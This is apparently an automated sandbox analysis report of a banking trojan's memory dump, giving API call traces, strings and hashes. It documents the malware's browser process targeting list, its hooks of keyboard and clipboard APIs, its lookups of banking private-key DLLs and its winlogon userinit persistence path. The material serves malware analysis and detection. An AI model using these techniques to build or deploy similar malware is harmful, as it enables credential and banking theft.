                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644242
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapFree.KERNEL32(00000000), ref: 02644245
                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 0264425D
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapAlloc.KERNEL32(00000000), ref: 02644260
                                                                                                                                                                                                                • Part of subcall function 02644180: memset.MSVCRT ref: 02644270
                                                                                                                                                                                                                • Part of subcall function 02644180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 0264428A
                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644297
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapValidate.KERNEL32(00000000), ref: 0264429A
                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 026442AB
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapFree.KERNEL32(00000000), ref: 026442AE
                                                                                                                                                                                                                • Part of subcall function 026444D0: memset.MSVCRT ref: 02644503
                                                                                                                                                                                                                • Part of subcall function 026444D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,76F93490), ref: 0264450E
                                                                                                                                                                                                                • Part of subcall function 026444D0: Process32First.KERNEL32 ref: 02644531
                                                                                                                                                                                                                • Part of subcall function 026444D0: GetHandleInformation.KERNEL32(00000000,?), ref: 0264454D
                                                                                                                                                                                                                • Part of subcall function 026444D0: CloseHandle.KERNEL32(00000000), ref: 02644567
                                                                                                                                                                                                                • Part of subcall function 02644710: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,76F93490,?,?,?,?,02645903,00000000), ref: 0264475A
                                                                                                                                                                                                                • Part of subcall function 02644710: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02645903,00000000,00000000,00000000), ref: 026447A5
                                                                                                                                                                                                                • Part of subcall function 02644710: HeapAlloc.KERNEL32(00000000,?,?,?,?,02645903,00000000,00000000,00000000), ref: 026447AC
                                                                                                                                                                                                                • Part of subcall function 02644710: memset.MSVCRT ref: 026447BF
                                                                                                                                                                                                                • Part of subcall function 02644710: _snprintf.MSVCRT ref: 0264480A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02645913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02645924
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSecuritySystem_snprintf$AllocDescriptorFreeUser$AdminCloseCreateFormatMetricsNameQueryTableTimeValidate$CapsConvertDateDefaultDeviceDirectoryDisplayEnvironmentFirstInfoLangLocalModuleNamedOpenProcess32SaclSnapshotStringToolhelp32ValueVariableWindowsZone
                                                                                                                                                                                                              • String ID: %c%d:%02d$%dx%d@%d$4.1.2$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                              • API String ID: 2738427392-2715564829
                                                                                                                                                                                                              • Opcode ID: 9895eaa45b8b7f00849d20d5bd1d301877404808780de20bf76f426b2e04f47e
                                                                                                                                                                                                              • Instruction ID: 779b21d1476679dab82ab83009c85654a479dab4680003290d91e5d4579b5311
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9895eaa45b8b7f00849d20d5bd1d301877404808780de20bf76f426b2e04f47e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DA20F70A81318BEFB209B94CC8AFEE7778EF45B04F514545F601BA1C0DBF46A858B69
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02643300: IsUserAnAdmin.SHELL32 ref: 02643325
                                                                                                                                                                                                                • Part of subcall function 02643300: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02643344
                                                                                                                                                                                                                • Part of subcall function 02643300: PathAddBackslashA.SHLWAPI(?), ref: 02643351
                                                                                                                                                                                                                • Part of subcall function 02643300: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 0264336E
                                                                                                                                                                                                                • Part of subcall function 02643300: _snprintf.MSVCRT ref: 02643389
                                                                                                                                                                                                                • Part of subcall function 02643300: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 026433A7
                                                                                                                                                                                                                • Part of subcall function 02643300: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 026433FC
                                                                                                                                                                                                                • Part of subcall function 02643300: RegCloseKey.ADVAPI32(00000000), ref: 0264340A
                                                                                                                                                                                                                • Part of subcall function 02665A50: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02665A7F
                                                                                                                                                                                                                • Part of subcall function 02665A50: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02665AB8
                                                                                                                                                                                                                • Part of subcall function 02665A50: _snprintf.MSVCRT ref: 02665B23
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02656CC0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02656CCB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02656CDF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02656CFB
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 02656D05
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 02656D3D
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0268FB68), ref: 02656D65
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02656D86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02656DA4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02656DC5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02656DDF
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02656DE9
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02653530,00000000,00000000,00000000), ref: 02656E38
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02656E4C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02656E5D
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02657DD0,00000000,00000000,00000000), ref: 02656E8C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02656EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02656EB1
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02658080,00000000,00000000,00000000), ref: 02656EC6
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,75775A6Fa), ref: 02656ED6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02656EF6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02656F17
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(75775A6Fa,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02656F34
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02656F3E
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0268FB80), ref: 02656F49
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026579D0,00000000,00000000,00000000), ref: 02656F5B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02656F6B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02656F7C
                                                                                                                                                                                                                • Part of subcall function 02646DE0: memset.MSVCRT ref: 02646E00
                                                                                                                                                                                                                • Part of subcall function 02646DE0: Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02646E1C
                                                                                                                                                                                                                • Part of subcall function 02646DE0: CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02646E78
                                                                                                                                                                                                                • Part of subcall function 02646DE0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,76F90F10,?,00000000,00000000), ref: 02646EA0
                                                                                                                                                                                                                • Part of subcall function 02646DE0: CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02646EB8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02656970,00000000,00000000,00000000), ref: 02656F91
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02656FA1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02656FB2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026554B0,00000000,00000000,00000000), ref: 02656FDC
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02656FF0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657001
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02657010
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02657013
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02657020
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02657023
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02657047
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02657059
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 02657065
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02657074
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02657090
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 026570B7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\java.exe), ref: 026570CD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 026570E3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 026570F9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\opera.exe), ref: 0265710F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02657125
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 0265713B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02657151
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02657167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\safari.exe), ref: 0265717D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02657193
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 026571A9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\frd.exe), ref: 026571BF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 026571D5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 026571EB
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265B8F0,00000000,00000000,00000000), ref: 02657219
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657233
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657240
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265EF80,00000000,00000000,00000000), ref: 02657255
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657269
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657276
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02660560,00000000,00000000,00000000), ref: 0265728B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265729F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026572AC
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02660E20,00000000,00000000,00000000), ref: 026572C1
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026572D5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026572E2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265F6A0,00000000,00000000,00000000), ref: 026572F7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265730B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657318
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265CB80,00000000,00000000,00000000), ref: 0265732D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657341
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265734E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265CC20,00000000,00000000,00000000), ref: 02657363
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657377
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657384
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02661590,00000000,00000000,00000000), ref: 02657399
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026573AD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026573BA
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026624D0,00000000,00000000,00000000), ref: 026573CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026573E3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026573F0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026631C0,00000000,00000000,00000000), ref: 02657405
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657419
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657426
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026632B0,00000000,00000000,00000000), ref: 0265743B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265744F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265745C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265FE80,00000000,00000000,00000000), ref: 02657471
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657485
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657492
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02663480,00000000,00000000,00000000), ref: 026574A7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026574BB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026574C8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026643F0,00000000,00000000,00000000), ref: 026574DD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026574F1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026574FE
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026647D0,00000000,00000000,00000000), ref: 02657513
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657527
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657534
                                                                                                                                                                                                                • Part of subcall function 02655720: memset.MSVCRT ref: 02655741
                                                                                                                                                                                                                • Part of subcall function 02655720: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F550,75777390,76F90A60), ref: 02655757
                                                                                                                                                                                                                • Part of subcall function 02655720: AddVectoredExceptionHandler.KERNEL32(00000001,02643A20), ref: 02655764
                                                                                                                                                                                                                • Part of subcall function 02655720: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0265577F
                                                                                                                                                                                                                • Part of subcall function 02655720: CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02655799
                                                                                                                                                                                                                • Part of subcall function 02655720: GetHandleInformation.KERNEL32(00000000,?), ref: 026557B1
                                                                                                                                                                                                                • Part of subcall function 02655720: CloseHandle.KERNEL32(00000000), ref: 026557C2
                                                                                                                                                                                                                • Part of subcall function 02655720: InitializeCriticalSection.KERNEL32(0268FB50), ref: 026557D3
                                                                                                                                                                                                                • Part of subcall function 02655720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 026557E9
                                                                                                                                                                                                                • Part of subcall function 02655720: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 026557FB
                                                                                                                                                                                                                • Part of subcall function 02655720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 0265581A
                                                                                                                                                                                                                • Part of subcall function 02655720: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02655828
                                                                                                                                                                                                                • Part of subcall function 02655720: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02655844
                                                                                                                                                                                                                • Part of subcall function 02655720: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02655860
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026619A0,00000000,00000000,00000000), ref: 02657549
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265755D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265756A
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02661C80,00000000,00000000,00000000), ref: 0265757F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657593
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026575A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026480C0,00000000,00000000,00000000), ref: 026575B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026575CD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026575E6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 026575FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02657613
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02657625
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02657637
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02657649
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\core.exe), ref: 0265765B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 0265766D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 0265767F
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 026576EC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 026576FB
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02657714
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 0265771B
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,75775d6fa), ref: 02657731
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0264BC50,00000000,00000000,00000000), ref: 02657745
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265775D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265776E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00007FD0,00000000,00000000,00000000), ref: 02657783
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265779B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026577AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Create$Thread$Information$Close$Security$Descriptor$AddressProc$HeapProcess$CriticalCurrentFreeInitializeModuleMutexPathSectionUser$AdminBackslashCommandConvertFileInfoLibraryLineLoadLocalNameNamedSaclStringVolume_snprintfmemset$DesktopDirectoryEnvironmentExceptionFolderHandlerMultipleObjectObjectsOpenQuerySleepSystemValidateValueVariableVectoredWaitWindowslstrcmpi
                                                                                                                                                                                                              • String ID: --no-sandbox$ --no-sandbox$75775923a$75775A6Fa$75775d6fa$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$S:(ML;;NRNWNX;;;LW)$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll
                                                                                                                                                                                                              • API String ID: 3526539773-2913021656
                                                                                                                                                                                                              • Opcode ID: 5a3111f6b1d7c09c66be338950b423c18d3ddb5a1b6498044bbc452a07394121
                                                                                                                                                                                                              • Instruction ID: c8bacad36c25e28326912b37b8ed133b6e935c4d3237705de67a742c2f8d1152
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a3111f6b1d7c09c66be338950b423c18d3ddb5a1b6498044bbc452a07394121
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7062CB71E81329B6FB21D7A4CD45FAEBBAC5F04B44F604644FE05B62C0DBB0DA418AA5

                                                                                                                                                                                                              Control-flow Graph (graph not preserved; first block 2655720-26557a3)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02655741
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F550,75777390,76F90A60), ref: 02655757
                                                                                                                                                                                                              • AddVectoredExceptionHandler.KERNEL32(00000001,02643A20), ref: 02655764
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0265577F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02655799
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 026557B1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026557C2
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0268FB50), ref: 026557D3
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 026557E9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 026557FB
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 0265581A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02655828
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02655844
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02655860
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0268FB38), ref: 0265587B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02655882
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02655892
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,026479E0,02699E88), ref: 026558A8
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 026558C3
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 026558D8
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 026558DF
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,75775d6fa), ref: 026558F1
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 0265590B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 0265591B
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,0264BB50,0268EB74), ref: 02655931
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02655940
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02655955
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 0265595C
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,75775d6fa), ref: 0265596E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,java), ref: 026559A2
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.exe), ref: 026559B4
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,frd.exe), ref: 026559CA
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 026559E1
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 026559EF
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02655A0B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02655A27
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0268FB20), ref: 02655A42
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02655A6F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02655A7B
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02655A9A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02655AA6
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02655AC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02655AD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                              • String ID: .exe$75775d6fa$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$frd.exe$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                              • API String ID: 1248150503-270038200
                                                                                                                                                                                                              • Opcode ID: 28641a7918a25ec63985f1ee5495eba97b63afb089833f3db4ff431baaa5b6f7
